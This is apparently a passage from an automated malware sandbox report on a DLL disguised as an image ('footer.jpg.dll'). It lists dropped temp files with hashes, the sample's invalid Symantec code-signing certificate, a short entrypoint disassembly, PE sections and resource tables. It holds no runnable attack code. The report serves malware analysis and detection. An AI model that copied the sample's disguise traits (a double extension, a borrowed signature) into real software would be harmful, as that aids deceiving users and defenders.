                                                                                                                                                                                                                                                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loJ9lop9lWpT9cNxVuh:kBqoIyspT9IxVuh
                                                                                                                                                                                                                                                          MD5:D492BEE4E96F788B5F39D629F53ED622
                                                                                                                                                                                                                                                          SHA1:AFDCBB19F1366A36FC0E51787B2C16C879CD7961
                                                                                                                                                                                                                                                          SHA-256:7E9773E3D5224E85B0A7AD66AF7449CF55155A5EA3EF055CB8C36F0179543523
                                                                                                                                                                                                                                                          SHA-512:41F5A6476F25A8F19169378FC07A83D9850B8C8E725F90966F5432A02B73218F7D52E4FE94C3B1C07BDCC86AEC580974BA3C939EF8A16A3CA16E329247BA38B7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF90B51EC099A605B5.TMP
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):193192
                                                                                                                                                                                                                                                          Entropy (8bit):3.1283856957637775
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:FZ/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGt:so
                                                                                                                                                                                                                                                          MD5:F6FA92618221807226F3B2ABEF79FCE4
                                                                                                                                                                                                                                                          SHA1:AC39FFBB84190886C540FF491C98B98DB2A0BD41
                                                                                                                                                                                                                                                          SHA-256:A3903337CC912881A237087FAA61E7EF4D35DC91495A1B6C0460E1269A07E4B2
                                                                                                                                                                                                                                                          SHA-512:EA0FABE882084500A3A8CA88455572614F149D77C710FA81490B50E86A57750C2CB77FC451E5429F6EBECFAF8D61E66652B4F32E2D2A036B973917897D394867
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFEA4C2E9B9C29C43E.TMP
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39697
                                                                                                                                                                                                                                                          Entropy (8bit):0.5832019889913723
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:kBqoxKAuvScS+8adqdDd/Id/ef/yngmh+Z/98f/yngmh+Z/9cf/yngmh+Z/99:kBqoxKAuvScS+8aAhK0EhlEhhEhm
                                                                                                                                                                                                                                                          MD5:E3567C984B14233A10B69B10F2F9C0BE
                                                                                                                                                                                                                                                          SHA1:1D1B9176B624D206E80323E1AE2F6E6E84513F0C
                                                                                                                                                                                                                                                          SHA-256:A70279C541EA1E20597104F0F0727C0F95AF5114D43A3B7949CD86B263346124
                                                                                                                                                                                                                                                          SHA-512:1FEC1F0669E7F030F267F6985EE1B5368009E08E19D9B3282C167F679202EC40DF327BCDE7E0AA4A59656D0BC085D5C77B4EB68DEA17E10139B1102027E2EC8E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J0IS2MH3I1HUIAFWGJFX.temp
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5149
                                                                                                                                                                                                                                                          Entropy (8bit):3.1768940185223333
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:gdidPfI6C9GrIo+AsASFOdidPfI6h683GrIo+AczldidPfI6x9GrIo+AV1H:5Pfg9SeAJAPfp3SeANPfn9SeAf
                                                                                                                                                                                                                                                          MD5:7A227A79F5B2F8497B1D29CCAE383DA5
                                                                                                                                                                                                                                                          SHA1:828C3F809D4FB1DF3D0FF49DCCFD49D22FA83ECE
                                                                                                                                                                                                                                                          SHA-256:8644F1CA1587D348BF101700BC63E14A2741F165EF2D84D88740BF179CEB40D0
                                                                                                                                                                                                                                                          SHA-512:D27D97E75EDC92997B4DF751DF45AC40CD582B85FC598AA8B55E67A9C416A9505D696D2A00AE12F33B70B06DF44E844985FE24EA17EF0EDF57C93B80B5E69AD4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: ...................................FL..................F.@.. .....@.>...s..Wz.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q|<..PROGRA~1..t......L.>Q|<....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.JR}7..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JJR}7.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]..............1.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                                                                          Entropy (8bit):5.850839808832977
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:footer.jpg.dll
                                                                                                                                                                                                                                                          File size:293744
                                                                                                                                                                                                                                                          MD5:9df5fcca1aadec6333301aca7a13c481
                                                                                                                                                                                                                                                          SHA1:f3445c636e0a702eff7782b9e8eeb4ca84f842ff
                                                                                                                                                                                                                                                          SHA256:8df914f790a6e5eb07042cce36ea9a23e23cdc1610d930f306f9ef55b6d8a2c5
                                                                                                                                                                                                                                                          SHA512:c1bb8d9ce6f014cc6c1dd68e767c03bbc4d56875f792d2f994f5740ad2d23ab75d3caa9b9d9778fab903685db4f87c1b999756e5b3a971dec1a405cad5ac17ad
                                                                                                                                                                                                                                                          SSDEEP:6144:SExImdn3y5LQv+0az3d1jDbj950ylG+OhZHoTV43:SExTn34Qv+rz3/jDbj950ylG+AZH+V43
                                                                                                                                                                                                                                                          File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!.....~..........(*............@..........................p......kz..............................\......

                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                          Icon Hash:8f9b9b9b9b9e9e8d

                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Entrypoint:0x402a28
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:d9b84120fbcc594b075c19efa9f388ec

                                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                          Signature Issuer:CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                          • 10/31/2007 1:00:00 AM 11/25/2010 12:59:59 AM
                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                          • CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                          Thumbprint MD5:773A103A1953B292916AAA8D3382140B
                                                                                                                                                                                                                                                          Thumbprint SHA-1:508E846523E1B131438B220694BE91793886508E
                                                                                                                                                                                                                                                          Thumbprint SHA-256:F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
                                                                                                                                                                                                                                                          Serial:758F5EE8263B6694719D8434EB998608

                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                          sub esp, 40h
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                                                          call dword ptr [004367ACh]
                                                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                                                          mov dword ptr [ebp-38h], eax
                                                                                                                                                                                                                                                          push FFFFFFFFh
                                                                                                                                                                                                                                                          push FFFFFFFFh
                                                                                                                                                                                                                                                          call dword ptr [00436738h]
                                                                                                                                                                                                                                                          mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                                                          push 0000001Bh
                                                                                                                                                                                                                                                          push dword ptr [0044CC4Ch]
                                                                                                                                                                                                                                                          push 0000005Bh
                                                                                                                                                                                                                                                          push 0000005Eh
                                                                                                                                                                                                                                                          push 0000000Ah
                                                                                                                                                                                                                                                          push dword ptr [0044CCD0h]
                                                                                                                                                                                                                                                          push 00000075h
                                                                                                                                                                                                                                                          push 00000016h
                                                                                                                                                                                                                                                          push 00000033h
                                                                                                                                                                                                                                                          call 00007F8448E1BB27h
                                                                                                                                                                                                                                                          lea ecx, dword ptr [0044CC4Ch]
                                                                                                                                                                                                                                                          mov dword ptr [0044CC88h], ecx
                                                                                                                                                                                                                                                          push 0044B3D0h
                                                                                                                                                                                                                                                          call dword ptr [00436860h]
                                                                                                                                                                                                                                                          mov dword ptr [0044CCD0h], eax
                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                          je 00007F8448E17F39h
                                                                                                                                                                                                                                                          mov dword ptr [ebp-2Ch], eax
                                                                                                                                                                                                                                                          push 0044C8D4h
                                                                                                                                                                                                                                                          push 00437140h
                                                                                                                                                                                                                                                          push 0000005Ah
                                                                                                                                                                                                                                                          push 0044B81Ch
                                                                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                                                                          call dword ptr [00436750h]
                                                                                                                                                                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                          push dword ptr [0044CC88h]
                                                                                                                                                                                                                                                          call 00007F8448E1C7BBh
                                                                                                                                                                                                                                                          mov eax, eax
                                                                                                                                                                                                                                                          sub eax, 05h
                                                                                                                                                                                                                                                          mov dword ptr [0044CC78h], eax
                                                                                                                                                                                                                                                          push 0044B4E8h
                                                                                                                                                                                                                                                          push 0044B7B8h
                                                                                                                                                                                                                                                          push 00000061h
                                                                                                                                                                                                                                                          push 0044C054h
                                                                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                                                                          call dword ptr [0043670Ch]
                                                                                                                                                                                                                                                          jmp 00007F8448E1DE0Ah
                                                                                                                                                                                                                                                          inc dword ptr [ebp-48h]
                                                                                                                                                                                                                                                          add edi, dword ptr [ebp+18h]
                                                                                                                                                                                                                                                          mov dword ptr [0000BF5Ch], edi

                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x8d5c0x5d2
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x368780x78.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x23db4.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x466000x1570.data
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x760000xdf8.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3670c0x16c.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x10000x7d840x7e00False0.553509424603data6.22201093313IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .scalma0x90000x1f20x200False0.904296875data5.64374973739IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .submont0xa0000x54710x200False0.72265625data4.8373098102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .enrive0x100000x55430x400False0.5205078125data3.92071196367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .photopo0x160000x551b0x400False0.478515625data3.68373557762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .circumz0x1c0000x55480x400False0.5166015625data3.98828405351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .cledoni0x220000x55850x400False0.546875data4.16085889307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .anamorp0x280000x27c0x400False0.5302734375data4.0409895IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .ac0x290000x20d0x400False0.4619140625, code offset 0x0+3, Bytes/sector 21760, sectors/cluster 15, reserved sectors 53431, FATs 104, root entries 1019, Media descriptor 0xff, sectors/FAT 20501, sectors/track 16496, FAT (12 bit by descriptor)3.47420747402IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .zelania0x2a0000x55160x400False0.490234375data3.71276690203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .accusat0x300000x55870x400False0.5654296875data4.29306303539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rdata0x360000x8f00xa00False0.42578125data4.67189250401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .data0x370000x1afbb0x15e00False0.63109375data5.22020830557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rsrc0x520000x23db40x23e00False0.335610844948data5.18569235662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .reloc0x760000xdf80xe00False0.849051339286data6.78504743018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                          RT_ICON0x535280x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 2559086728, next used block 1484812416EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x54b500x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x553f80x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x55ca00x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x565480x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x56ab00x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x573580xea8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x582000x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 3520780239, next used block 702208062EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x598280x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1820116711, next used block 7376758EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x59b100x1e8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x59cf80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x59e200x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15462911, next used block 15987701EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5a6c80x6c8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5ad900x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5b2f80x10a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5c3a00x988dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5cd280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5d1900x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5da380x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5e2e00x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5eb880x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5f4300x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5fcd80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x5fe000x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x603680x2e8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x606500x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x60ef80x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 4290903295, next used block 4294967295EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x615600xea8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x624080xfe0dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x633e80x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x63c900x8c0dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x645500x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x64df80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x653600x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 28723, next used block 0EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x656480x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x657700x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x660180xc7cdataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x66c940x2e8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x66f7c0x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x678240x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x680cc0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x689740x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6921c0x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x693440x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x698ac0x2e8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x69b940x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6a43c0x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 4294967295EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6aaa40xea8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6b94c0x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6bdb40x988dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6c73c0x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6d7e40x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x6fd8c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x73fb40x8a8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_ICON0x7485c0xea8dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757040x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757180x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7572c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757400x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757540x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757680x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7577c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757900x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757a40x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757b80x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757cc0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757e00x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x757f40x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758080x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7581c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758300x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758440x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758580x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7586c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758800x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758940x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758a80x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758bc0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758d00x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758e40x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x758f80x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7590c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759200x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759340x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759480x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x7595c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759700x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759840x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759980x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759ac0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759c00x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759d40x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759e80x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x759fc0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a100x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a240x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a380x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a4c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a600x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a740x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a880x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75a9c0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75ab00x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75ac40x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75ad80x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75aec0x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75b000x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75b140x14dataEnglishUnited States
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x75b280x14dataEnglishUnited States
